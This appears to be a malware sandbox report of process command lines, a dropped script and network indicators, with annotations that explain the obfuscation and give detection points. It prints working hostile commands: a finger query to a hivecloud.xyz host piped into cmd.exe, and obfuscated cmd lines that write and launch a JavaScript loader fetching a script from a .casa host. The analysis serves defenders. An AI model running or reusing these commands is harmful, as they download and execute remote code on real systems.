Technical Information (process command lines, a dropped file, and network/DNS activity)
- '<SYSTEM32>\finger.exe' ok@t382dgeuaua.hivecloud.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\C7M.js"
- %LOCALAPPDATA%\c7m.js
- 't3######aua.hivecloud.xyz':79
- 'wt####.##vzydvajykxbudate.casa':80
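- 'cl###flare.com':443
- 'microsoft.com':80
  (Note: these two hosts appear to be widely used legitimate services. On their own they are poor block-list indicators; the hivecloud.xyz and .casa hosts listed above are the sample-specific ones.)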
- 't3######aua.hivecloud.xyz':79
- 'cl###flare.com':443
- DNS ASK t3######aua.hivecloud.xyz
- DNS ASK wt####.##vzydvajykxbudate.casa
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
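- '<SYSTEM32>\cmd.exe' /c finger ok@t382dgeuaua.hivecloud.xyz |more +2 |cmd
  (Note: the text returned by the finger query is passed through `more +2`, which drops the leading lines of the response, and the remainder is piped into cmd.exe as commands. finger.exe is rarely used legitimately, so an outbound connection from it on TCP/79 and a cmd.exe reading its piped output are practical detection points.)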
- '<SYSTEM32>\cmd.exe'
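- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TBPH=.j&&SEt HCAEI=v49jEar49jE a =49jE 'sc49jEri49jEpt49jE:'; b =49jE 'h49jETtP49jE:'; G49jEet49jEObj49jEec49jEt(49jEa+b+'&&sET G5GZ=CUXAQCUXAQwtaa0h.yavzydvajykxbudate.casaCUXAQ?1C...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p L68L1="%HCAEI:49jE=%%G5GZ:CUXAQ=/%" 0<nul 1>%LOCALAPPDATA%\C7M%TBPH%s"
  (Note: these two commands assemble a script from environment variables padded with the filler strings `49jE` and `CUXAQ`. The `%VAR:str=%` substitutions in the second command strip `49jE` and turn `CUXAQ` into `/`, and the output is redirected to %LOCALAPPDATA%\C7M.js, because TBPH holds `.j`. With the padding removed, the text is a `GetObject('script:' + 'hTtP:' + ...)` call pointing at the .casa host. The command line therefore carries the unmasked form of the host name that is partly masked in the network list, which can be matched against DNS and proxy logs.)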
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\C7M%TBPH%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\C7M.js